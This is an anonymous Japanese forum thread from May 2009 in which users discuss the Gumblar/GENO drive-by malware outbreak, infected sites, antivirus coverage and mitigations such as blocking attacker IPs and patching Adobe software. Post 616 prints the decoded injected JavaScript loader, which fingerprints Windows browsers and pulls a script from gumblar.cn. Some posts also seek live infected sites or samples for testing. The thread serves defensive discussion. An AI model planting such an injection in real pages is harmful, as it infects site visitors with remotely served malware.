557 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:39:05 ]: >>556
おおっ！！

ありがとう勇者様、一昨日は大丈夫だったらしいんだが･･･
なんか被害拡散してるなｗ
558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:40:42 ]: 何れにしても中古の使い捨てＰＣでよかったよ。
559 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:40:51 ]: これってプログラムが書き換えられるだけみたいだし
システムの復元とか使えないんだろか？
560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:44:36 ]: >>559
フルバックアップでもなければ無理だろ。
561 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:46:09 ]: >>559
>システムの復元

それのほうが怖いよｗ
562 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:46:35 ]: スレの伸び方が恐ろしい。
急に拡散した？
563 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:47:32 ]: >>559
そんな無意味な事するくらいならインストールしなおすわ。
564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:50:40 ]: >>562
前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・
565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:51:03 ]: >>544
こんなのあるのか
thx
566 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:51:43 ]: >>549
中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない？
567 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:56:18 ]: PeerGuardian 2 for Windows β6b 日本語第2版
ttp://www.dukedog.flnet.org/cgi-bin/Statistics/dl.php?dl=pg2-050918-nt-jp
繋がらなくて落とせねぇ
568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:57:36 ]: >>566
だよね･･･
569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 21:58:08 ]: >>562
小林製薬(>>351)とネラーに利用者が多そうなSayMove!(>>282)の感染が発覚。
570 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:02:05 ]: 小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。
571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:02:28 ]: これはググルさんが公式に対策に乗り出したってこと？
Google Safe Browsing diagnostic page for gumblar.cn
google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=en
Gumblar hitting Googlers hard
www.daniweb.com/blogs/entry4339.html#
Large amount of cross-site scripting attacks see websites compromised - SC Magazine UK
www.scmagazineuk.com/Large-amount-of-cross-site-scripting-attacks-see-websites-compromised/article/136763/
572 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:02:29 ]: 潜在感染者が多そうだな。
573 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:03:35 ]: >>568
てゆうかWeb of Trustでググッたこのサイトは大丈夫かな？
d.hatena.ne.jp/starocker/20071206/p1
なんかもうどのサイトも不安になってきたよ
できたらチェックお願いVISTAの方
574 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:11:47 ]: >>573
俺XPなんで、対策してても怖くて踏めませんｗ

ところで>>129が繋がんないんだけど、俺だけ？
575 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:11:55 ]: ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。
576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:15:00 ]: VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。
あとAcrobat Reader9.1でも感染するっけ？
577 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:19:20 ]: >>576
>>551
578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:20:23 ]: 感染してすぐ症状出るものですか？
579 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 22:20:33 ]: フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど
特になにもおきない
580 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 22:21:25 ]: （＼.n　　　　　安全安心とっても快適な工夫もいっぱい　windowsVISTA　みんな買おうよ！
　ヽ .ｿ
　　| ｜　　　　　　　　　　∧＿∧ 　
　　| ｜　∧＿∧　　＿（　´∀｀）　　 ∧＿∧ 　　 ∧＿∧　　∧＿∧　　　 ∧＿∧　　　 ∧＿∧
　　＼＼（ ´∀｀）￣　　　　　　⌒ヽ　（ ´∀｀）　　（ ´∀｀） _ （´∀｀　）⌒`（´∀｀　）--―（´∀｀　）　　　　n
　　　＼　　　　　⌒￣ヽ　　　　　 ./~⌒　　　　⌒/⌒　　　⌒ヽ　　　　　/~⌒　　　　 ⌒＼　　　　　＼　（ E）
　　∩.　`、　　　　　 ./￣|　　　　/／`i　　　　　/ 　　　　　　　/| 　　　　/／`i 　　　　　 /　| 　　　　ヽ　ヽ／／
　.　(7ヌ)｜　　　　　|　（ミ　　　　ミ）｜ ∧__∧　｜　　　　 /（ミ　　　ミ）　　｜∧＿∧｜｜　　　　 | ＼__／
　　/　/　 ∧＿∧　　　 ∧＿∧　　＿（　´∀｀）　　∧＿∧　　　∧＿∧＿（´∀｀　）　　∧＿∧　　｜｜
　　＼＼（　´∀｀）―--（ ´∀｀）￣　　　　　　⌒ヽ　（ ´∀｀）　　（ ´∀｀） _　　　　　⌒ヽ（´∀｀　）　／／
　（＼.n＼　　　　　　　／⌒　　　⌒￣ヽ　　　　　/~⌒　　　　⌒/⌒　　　⌒ヽ　　　　　 /~⌒　　　　⌒　/
　ヽ .ｿ　｜　　　　　 |ｰ、　　　　　/￣|　　　　　 /／`i 　　　　　 / 、　　　　　/| 　　　 /／` i　　　　　/
　　| ｜　｜　　　　 |　 |∧＿∧ / 　（ミ　　　　ミ）　｜　　　　｜｜　　　　/（ミ　　　ミ）　.｜　　　｜
　　| ｜　∧＿∧　　＿（　´∀｀）　　∧＿∧ ｜　∧＿∧_＿_∧＿∧　 .｜∧＿∧　＼　∧＿∧.｜
　　＼＼（ ´∀｀）￣　　　　　　⌒ヽ（ ´∀｀）　|　（ ´∀｀） _ （´∀｀　）⌒`（´∀｀　）--―（´∀｀　） |　.　.　n
　　　＼　　　　　⌒￣ヽ　　　　. /~⌒　　　　⌒/⌒　　　⌒ヽ　　　　　/~⌒　　　　 ⌒＼　　　　　＼　　（ E）
　　∩.　`、　　　　　./￣|　　　　/／`i　　　　　 / 、　　　　　 /| 　　　　/／`i 　　　　　 /　| 　　　　ヽ　ヽ／／
　.　(7ヌ)｜　　　　　|　（ミ　　　ミ）　｜　∧　∧ ｜　　　　/（ミ　　　　ミ）　｜∧　∧ ｜｜　　　　 | ＼__／
581 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:22:32 ]: ポットウィルスなら駆除出来るけどこれは難しいのかなぁ
582 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:24:33 ]: >>580
お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか？
583 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:25:51 ]: >>567
オレも導入しようとしたが、日本語版とれないな・・・
584 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:26:21 ]: >>579
>>102は？
585 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:28:19 ]: aguseでは白だな。＞あさがやドラム
586 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:28:25 ]: 質問です。

私、セキュリティソフトはソースネクストのウィルスセキュリティZERO を使ってるのですが、

このセキュリティソフトはGENOウィルスに対応しているんでしょうか？
587 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:30:01 ]: >>586
>>575
588 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 22:31:58 ]: >>584
アドビ8.13にして全部踏んだけどなんともないわ
589 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:32:14 ]: >>579
>>432のGoogle セーフブラウジングの結果で挙げられている幾つかのサイトはどうか。
590 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:33:16 ]: >>579
そのサイトも侵されている
591 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:33:51 ]: Adobe Reader・Acrobat に不正終了やコード実行の脆弱性―JPCERT/CC が注意喚起 - japan.internet.com Webテクノロジー
japan.internet.com/webtech/20090514/5.html

本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布：ITpro
itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
こっちは関係あると思ったらなかった
592 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:36:15 ]: もうなにがなんだかｗｗｗｗｗ
593 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 22:45:36 ]: どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ
594 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:50:36 ]: ポッドウィルス駆除じゃこれは取りきれないか？
595 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:52:56 ]: ポッドウィルスw
596 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 22:57:41 ]: >>594
つクリーンインストール
597 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:04:34 ]: >>593
↓このスレから種を拾って直接実行すれば…。

【鑑定目的禁止】検出可否報告スレ10
pc11.2ch.net/test/read.cgi/sec/1235459712/
598 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:04:50 ]: >>595
ごめん。ポットだったｗ
599 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:11:33 ]: またかｗ

BIG-server.com binboserver.com メンテナンス / 障害報告
www.maido3.cc/server/release/2009/200905082023.html
600 名前：PG2 mailto:sage [2009/05/14(木) 23:19:50 ]: PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を
PG2のリスト追加にコピペすればいいのかな？
601 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:22:43 ]: 今北産業　現状のウイルス対策ソフトじゃ対応できないってマジ？
602 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:24:21 ]: 亜種がワラワラ出てきてるｗｗｗ
対応おっつかねｗｗｗ
603 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:25:56 ]: Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん
わかりやすく載せとけよ
604 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:27:21 ]: maidoの感染は、マァブが原因らしい
605 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:28:45 ]: 具体的に被害が出てるのはOS関連ファイル？
普通のファイルにも感染する？
606 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:29:00 ]: ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。
607 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:30:37 ]: 対策
* WindowsUpdate
* PDFリーダーを最新にする　（AdobeReader　や Foxit Reader）
* AdobeFlashを最新にする
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
* Javascriptを切る
* 貼られている怪しいリンクをむやみに開かない
* ウイルス定義ファイルを更新する

↑これの
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
はfirefoxのアドオンで対応できますか？
608 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:33:05 ]: >>567 >>583　こちらへ

PeerGuardian 33
tp://hideyoshi.2ch.net/test/read.cgi/download/1237676474/
609 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:34:41 ]: >>607
アンチウイルスのFWに設定したほういいと思う
610 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:36:08 ]: Javascript切ると見れなくなるサイトいっぱいあるじゃん
不便すぎる
611 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:38:23 ]: adobe関係をアンインストールしときゃなんとかなる？
WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー
強化の為にはまあ必要なことだ。
612 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:38:59 ]: >>608
ありがとう。スレあったのね。いってきマース
613 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:41:45 ]: >>609
ウイルスバスターだけど、設定画面みても分からんなｗ
ひょっとしてできないのかしら･･･
614 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:54:57 ]: >>613
暇だから調べてみた
ttp://virus.bind-web.net/virusburster2009/wall/wall-reigai.html
この辺参考にならん？
615 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 23:55:30 ]: >>613
例外ルール（プロトコル）でぐぐれ
616 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:03:13 ]: >あさがやドラム
解読してみた。

(function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;");
document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g);

真っ黒でつ。
617 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:06:57 ]: ﾄﾞｸｵが混じってるかと思ったら別もんか
("A")
618 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:09:02 ]: /gumblar.cn・・・
619 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:12:07 ]: でもこれで感染したサイトへの電凸が容易になったんじゃない？
「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし
（誰もが知っている）大手のサイトだから信用もしてもらいやすくなったはず
620 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:25:36 ]: >>617
こっちは泣いてるおにゃのこっぽいな＞ (/_/g);
621 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:30:32 ]: ﾒｶﾞﾈﾒｶﾞﾈ ("A" )))....
622 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:33:44 ]: b "j;")
623 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:35:38 ]: 大山鳴動して鼠一匹
624 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:40:38 ]: ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ？

で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」

…
625 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:43:30 ]: どういうこともなにも感染してたんだろう
お兄ちゃんがわかってくれるか心配だね
626 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:45:01 ]: 弟なのか妹なのか
627 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:45:48 ]: しかし…
この脅威に世間は知らん振りか。
628 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:50:17 ]: >>624
ｗ
629 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:51:41 ]: abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか？
630 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:54:24 ]: >>629
最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。
631 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 00:56:05 ]: >>601
事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた
632 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:04:26 ]: aguse.jpってカスペなの？
633 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:06:27 ]: >>631
それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。
634 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:11:38 ]: aviraはどうなの？ちゃんと対応してる？
635 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:14:07 ]: sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの？
636 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:14:20 ]: >>634
pc11.2ch.net/test/read.cgi/sec/1235459712/862
自分で解凍してスキャンかけて確かめろ
637 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:15:15 ]: ここでも調べられます。　　　tp://www.gred.jp/
638 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:17:15 ]: >>634
gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。
639 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:19:31 ]: 国を指定して全てブロック出来れば良いのにね。出来るのかな？日本と米国以外行かないし。
640 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:28:43 ]: うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた…
IEだったら死んでたな
641 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:29:15 ]: ＧＥＮＯウイルスってＨＤも破損するんだろうか？
なんかクリーンインストールかけたんだけれどネットやってるとたまに切断されるようになっちゃったんだよな…
642 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:33:34 ]: ウイルスバスター2007のURLフィルタとフィッシングチェッカーを有効にした状態で
IE6にて、あさがやドラムのURLを開くと　「危険なサイト　アドレスｈｔｔp://gumblar.cn/rss/?id=568835」とメッセージが出た
643 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:36:45 ]: UnderForge of Lack ≫ Zlkon, Gumblar 問題に関して
www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
644 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:39:56 ]: gumblarに感染してたサイトのお詫び文が、
ノートンやバスターは検出しなかったしavastの誤検出っぽいけど、
avastユーザからの指摘がウザイので一応アップし直します
のように書いてあってなんだか悔しくなった

感染してもはっきり分からないから世間の感覚はこんなもんか
645 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:40:18 ]: 初心なことかもしれないけど
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
を制限するさいtcpとudpどっちなの？
646 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:42:21 ]: アップし直すだけじゃ無駄なのにな
647 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:44:33 ]: >>643
これ、次スレのテンプレに入れた方が良いんじゃね？
648 名前：642 mailto:sage [2009/05/15(金) 01:45:41 ]: >>644
ウイルスバスターでもブロックはできているみたいだ
649 名前：644 mailto:sage [2009/05/15(金) 01:48:40 ]: >>648
おそらく管理人がスキャンしたのはバスターが対応する以前と思われ
サイトが何日も感染した状態で放置されてたから
650 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:48:58 ]: >>645
TCPでしょう
いま、gumblar.cnでは94.229.65.172ですね
651 名前：642 mailto:sage [2009/05/15(金) 01:53:32 ]: >>649
ウイルスバスター2007の標準設定では反応なかったけれど
フィッシングチェッカーを有効にしたらメッセージがでるようになったよ
652 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:56:32 ]: 久しぶりに踏んでみたがリファラをチェックするようになったんだな
リファラ切ってるとpdfもswfも読み込まれない
653 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:56:41 ]: >>650
おｋ
ありがとう
654 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 01:57:19 ]: >>645
どちらかを制限しない理由があるのか？
655 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:01:07 ]: すっげーやばそうなウイルスなのに
あまり騒がれていないのは気のせいなの？
656 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:01:22 ]: >>644
パスワードを変えなきゃ再度改竄されるよ、と言ってあげないと…。
657 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:02:26 ]: >>641
運が悪いと壊れるかもしれないけど切断とHDD関係なくね？
658 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:02:41 ]: パスワード変えても無駄
659 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:05:20 ]: 管理者のPCのOSをクリーンインスコして、パスワードを変える。
660 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:06:19 ]: バスターはフィルタリング機能があるから
URLブラックリストに登録されれば遮断してくれるということか
661 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:06:28 ]: jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=zlkon.lv+%A4%AB%A4%E9+gumblar.cn+%A4%D8
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1126127806
excomp.cocolog-nifty.com/blog/2009/05/gumblarcnmd5-1b.html
puppet.asablo.jp/blog/2009/05/02/4283214
dxd8.com/archives/192/
ilion.blog.shinobi.jp/Entry/85/
662 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:08:20 ]: >>655
気のせいじゃないよ。もっと話題になっても良いと思う。
亜種がどんどん出るらしいし、それら全てに対応できるセキュリティソフトはおそらくない。
クリーンイストールしか解決策が無い。
やばいですね・・・
663 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:08:31 ]: blogs.yahoo.co.jp/noooo_spam
excomp.cocolog-nifty.com/blog/kaspersky/index.html

告知情報はこんなもんか？

豚インフルの比じゃねえ　はんぱねえ感染力！
664 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:11:16 ]: GENOは結局どこからこのウイルス持ってきたんだろ。
665 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:11:38 ]: 現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
666 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:12:32 ]: >>662
動画サイトとかFlash多様してるサイトなんかスクリプト許可しなきゃ見れないし
よく見るサイトが感染してたら知らないうちに被害受けるしな
注意してても危ないのに普通のやつなんかもう死んだも同然だろ
667 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:13:33 ]: >>665
Gumblarさん、マジパネェっす！
668 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:15:49 ]: ＞※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
669 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:16:31 ]: 俺は考えるのをやめた
670 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:19:18 ]: >>666
だよね。
いつも見てるサイトが感染したらと思うとおそろしいわ・・・
671 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:33:38 ]: >>508
参考にしてみた
thx
672 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:34:21 ]: GENOウィルスの怖いところはサーバ側で攻撃方法を自由に変えられるところなんだよな

・JavaScriptオフ
　　GENOの例を見る限り改竄はリモートから行われている。
　　今はJSを介しているがある日突然ダイレクトにembedタグ、objectタグを挿入される可能性がある。
　　この場合JSオフでの対応は不可能。

・Adobe Reader、Flash Playerを最新版にする、代替プラグインを使う
　　攻撃コードを入れ替えることができるので他のプラグイン、アプリの脆弱性を狙うことも可能。
　　最悪の場合ゼロデイを狙われる可能性もある。

・IE以外のブラウザを使う
　　Adobe関連の脆弱性はブラウザに依存しない。

・IPまたはドメインでブロック
　　攻撃コードを更新していくらでも別のサーバに振り向けることが可能。

・アンチウィルスでの対応
　　攻撃ファイルの更新が早く定義ファイルでの対応が追いついてない。
673 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:35:18 ]: >>666
readerもflashも最新版になってれば被害は防げるそうだけど
flashの方はウェブサイト側で警告出せるみたい（ニコ動は警告出してたような）
readerの方はアップデートしない人多いだろうなあ
674 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:39:38 ]: GENOにかかるとネットに繋がる時間が長くなるってほんと？

Googleに全然つながらないんだが
675 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:42:26 ]: Flash Playerを無効にしたらどう？

IEだと切り替え大変だけれど
676 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:48:20 ]: ネットのインフルエンザはパンデミックだな

てか無自覚で感染してるＰＣ多いんじゃないか？
677 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:49:11 ]: 何か感染したと思ったんだけど
いろんなチェックしてたらIE落ちなくなったわ
でもゲームが反応無しになる、なんだこれ
678 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:49:27 ]: はんぱねえ
679 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:51:31 ]: 何でGENOってウイルス作ってばら撒いてるのに情報通信規制法で逮捕されないの？
680 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 02:58:19 ]: ＷｉｎＭｅなんですが、ＧＥＮＯウイルスに感染する危険はありますか？
ＸＰはヤバイと聞きますが・・・
681 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 02:59:24 ]: Meの情報ないね　どうなの？
682 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:03:17 ]: これが後に語り継がれるMe最強伝説の始まりである。
683 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:03:27 ]: 親父が頑なにjavaオンのIEを使いたがる
切り替えが楽なプニルや火狐も入れといて説明したのに
684 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:07:07 ]: >>672
ｼﾞｬﾊﾞｽｸいつも切っていて火狐でﾈﾄｻﾌしていたら感染サイトを踏んでしまった
AVAST先生がいかり出したので接続きってブラウザ閉じたらウィルスをチェストに
隔離した方がいいとかいう画面が出てそのまま隔離
チェストをのぞいたら該当サイトのキャッシュが固まっていた
AVASTのスキャンとニフティスキャンをしたら感染０だったがブートスキャンも
しといたほうがいいかな？
685 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:09:05 ]: JavaScriptオフでも感染！？
686 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 03:12:06 ]: >>684
俺、avastでチェストに隔離できなかったんだけど大丈夫かな？
687 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:17:39 ]: 豚どころじゃねえぞ　おい
688 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:18:59 ]: これ対策でAdobe Readerを9に入れ替えたけど、
実は6.0.6を使ってた方が安全だったりする？ｗ
689 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:19:38 ]: オフにして感染されちゃどうしようもないなぁ
690 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:23:02 ]: >>684
JavaScriptオフで反応したんであれば、
avastが感染したページに挿入されたコードに反応したのかもしれない。
そうするとブラウザ自体はgumblarのスクリプトを実行してないので、感染はしていない。
いずれにせよ感染ページにどういうコードが仕込まれていたかによる。
JavaScriptが挿入されていたのなら問題はないはず。
691 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:24:17 ]: はやい話でIEが狙われているのですか？
692 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:25:25 ]: >>686
他で踏んだ時は警告音と右下に二つほどなんか説明でてすぐ消えた
この時は遮断クリックしたらおｋで終わった
